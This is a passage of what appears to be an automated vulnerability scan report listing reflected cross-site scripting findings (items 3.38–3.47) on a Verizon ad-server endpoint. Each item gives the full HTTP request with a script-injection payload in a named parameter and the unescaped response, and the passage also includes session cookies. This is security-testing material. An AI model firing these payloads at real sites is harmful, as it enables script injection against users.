GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=55b7c"><script>alert(1)</script>5aa14f10290&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:21 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
acking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=55b7c"><script>alert(1)</script>5aa14f10290&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.38. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vec parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the vec request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91b9e"><script>alert(1)</script>c95b9106569 was submitted in the vec parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=91b9e"><script>alert(1)</script>c95b9106569&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=91b9e"><script>alert(1)</script>c95b9106569&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.39. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vgodfamily parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the vgodfamily request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77b92"><script>alert(1)</script>a2d570f147e was submitted in the vgodfamily parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=77b92"><script>alert(1)</script>a2d570f147e&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
5?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=77b92"><script>alert(1)</script>a2d570f147e&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.40. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vgodunlim parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the vgodunlim request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 830fd"><script>alert(1)</script>3e4bb5b3888 was submitted in the vgodunlim parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=830fd"><script>alert(1)</script>3e4bb5b3888&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1392
Content-Type: text/html
Cache-Control: private
Content-Length: 1392

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=830fd"><script>alert(1)</script>3e4bb5b3888&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.41. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [viss parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the viss request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfa0e"><script>alert(1)</script>31b9443c757 was submitted in the viss parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=bfa0e"><script>alert(1)</script>31b9443c757&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:32 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
5494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=bfa0e"><script>alert(1)</script>31b9443c757&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.42. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vsbb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the vsbb request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f54fd"><script>alert(1)</script>ecbc842c8ef was submitted in the vsbb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=f54fd"><script>alert(1)</script>ecbc842c8ef&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=f54fd"><script>alert(1)</script>ecbc842c8ef&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.43. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [webex parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the webex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f786"><script>alert(1)</script>f1650cfbf93 was submitted in the webex parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=3f786"><script>alert(1)</script>f1650cfbf93&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:14:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
rtype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=3f786"><script>alert(1)</script>f1650cfbf93&search=" target="_top">
...[SNIP]...

3.44. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [webhosting parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the webhosting request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac813"><script>alert(1)</script>f2c20e38879 was submitted in the webhosting parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=ac813"><script>alert(1)</script>f2c20e38879&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ervice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=ac813"><script>alert(1)</script>f2c20e38879&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.45. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6c1b"><script>alert(1)</script>6238df5bdc3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.netb6c1b"><script>alert(1)</script>6238df5bdc3/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:00:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 360
Content-Type: text/html
Cache-Control: private
Content-Length: 360

<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.netb6c1b"><script>alert(1)</script>6238df5bdc3/homepage/1294431043/Top/default/empty.gif/726e6f58326b7a6e4b45494141693565?x" target="_top">
...[SNIP]...

3.46. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 485c9"><script>alert(1)</script>4b86c156f98 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage485c9"><script>alert(1)</script>4b86c156f98/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:00:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage485c9"><script>alert(1)</script>4b86c156f98/L15/780459428/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservi
...[SNIP]...

3.47. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd200"a%3d"b"4f3fa442ed1 was submitted in the REST URL parameter 6. This input was echoed as dd200"a="b"4f3fa442ed1 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/dd200"a%3d"b"4f3fa442ed1?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:01:16 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PJclQO20erias|O10escOz; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.verizononline.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1461
Content-Type: text/html
Cache-Control: private
Content-Length: 1461

<IFRAME SRC="http://ad.doubleclick.net/adi/N3285.verizon/B2343920.19;sz=300x250;click0=http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage/dd200"a="b"4f3fa442ed1/L24/276647423/UNKNOWN/VDSL/LMB_NAF_RON_300_2010_11_01/LowerMyBills_NAF_vznews_300_2009-06.html/726e6f58326b7a6e4b45494141693565?;ord=276647423?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPAC
...[SNIP]...

